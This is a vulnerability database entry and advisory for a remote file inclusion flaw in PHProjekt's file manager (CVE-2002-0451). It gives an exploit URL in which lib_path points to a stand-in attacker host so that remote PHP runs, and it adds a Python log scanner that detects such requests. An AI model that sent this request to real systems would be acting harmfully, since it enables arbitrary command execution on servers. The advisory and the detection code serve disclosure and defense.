PHProjekt Remote File Inclusion Arbitrary Command Execution Vulnerability

Vulnerability ID 1106643 Vulnerability type Unknown
Published 2002-03-13 Updated 2005-05-02
CVE ID CVE-2002-0451 CNNVD-ID CNNVD-200208-004
Platform PHP CVSS score 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/21343
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-004
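|Vulnerability details
PHProjekt is a free, open source PHP groupware package that includes a calendar, project management, a time card system, file management, contact management, a mail client and nine other modules. It runs on many Linux and Unix platforms and can also run on Microsoft Windows. A vulnerability exists in the file management module of PHProjekt: a remote attacker can attack by submitting a request that includes script code hosted on a remote host. By accessing the file manager directly and specifying that the module include an arbitrary file created on a host under the attacker's control, the attacker causes that file to be included; if the remotely included file is a PHP script, it is executed by the system. The problem is in the first line of filemanager/filemanager_forms.php: include_once("$lib_path/access_form.inc.php"); An attacker may exploit this vulnerability to execute arbitrary commands on the target system with the privileges of httpd. Whether exploitation succeeds depends on the PHP configuration of the host: if the 'allow_url_fopen' option in php.ini is set to 'off', the attack fails.
|Exploit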
source: http://www.securityfocus.com/bid/4284/info

PHProjekt is a freely available, open source PHP Groupware package. It is actively maintained by the PHProjekt Development Team. It will run on most Linux and Unix variants, in addition to Microsoft Windows operating systems.

PHProjekt is prone to an issue which may allow an attacker to include arbitrary files located on a remote server. If the included file is a PHP script, this may allow for execution of arbitrary attacker-supplied code.

Successful exploitation depends partly on the configuration of PHP on the host running the vulnerable software. If 'allow_url_fopen' is set to 'off' then exploitation of this issue may be limited.

http://site.com/filemanager/filemanager_forms.php?lib_path=http://attacker.com/nasty/scripts
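
The following Python script is an added example, not part of the advisory or of PHProjekt. It scans web-server access logs for requests to filemanager/filemanager_forms.php whose lib_path query parameter carries a URL, which is the request pattern shown above. The log lines are constructed samples, and the combined log format and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = """\
192.0.2.10 - - [13/Mar/2002:10:01:02 +0000] "GET /filemanager/filemanager_forms.php?lib_path=http://attacker.com/nasty/scripts HTTP/1.0" 200 512
192.0.2.11 - - [13/Mar/2002:10:02:40 +0000] "GET /filemanager/filemanager_forms.php?mode=forms HTTP/1.0" 200 2048
192.0.2.12 - - [13/Mar/2002:10:03:15 +0000] "GET /filemanager/filemanager_forms.php?lib_path=http%3A%2F%2Fattacker.com%2Fx HTTP/1.0" 200 512
192.0.2.13 - - [13/Mar/2002:10:04:00 +0000] "GET /filemanager/filemanager_forms.php?lib_path=lib HTTP/1.0" 200 900
"""

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with "<scheme>://" is a URL, not a local library directory.
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.I)
SCRIPT = "/filemanager/filemanager_forms.php"   # file named in the advisory
PARAM = "lib_path"                              # variable used by its include_once


def find_remote_includes(log_text):
    """Return (client, value) for each request that sets lib_path to a URL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue                      # not a request line we understand
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith(SCRIPT):
            continue
        # parse_qsl percent-decodes, so an encoded "http%3A%2F%2F" is caught too.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name == PARAM and SCHEME_RE.match(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in find_remote_includes(SAMPLE_LOG):
        print(f"{client} supplied {PARAM}={value}")
```

Only the query string of the logged request line is inspected; a lib_path value sent in a POST body does not appear in an access log and needs request-body logging to be seen.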
|References

Source: BID
Name: 4284
Link: http://www.securityfocus.com/bid/4284
Source: XF
Name: phpprojekt-filemanager-include-files(8448)
Link: http://www.iss.net/security_center/static/8448.php
Source: BUGTRAQ
Name: 20020313 Command execution in phprojekt.
Link: http://www.securityfocus.com/archive/1/261676
Source: www.phprojekt.com
Link: http://www.phprojekt.com/modules.php?op=modload&name=News&file=article&sid=19&mode=&order=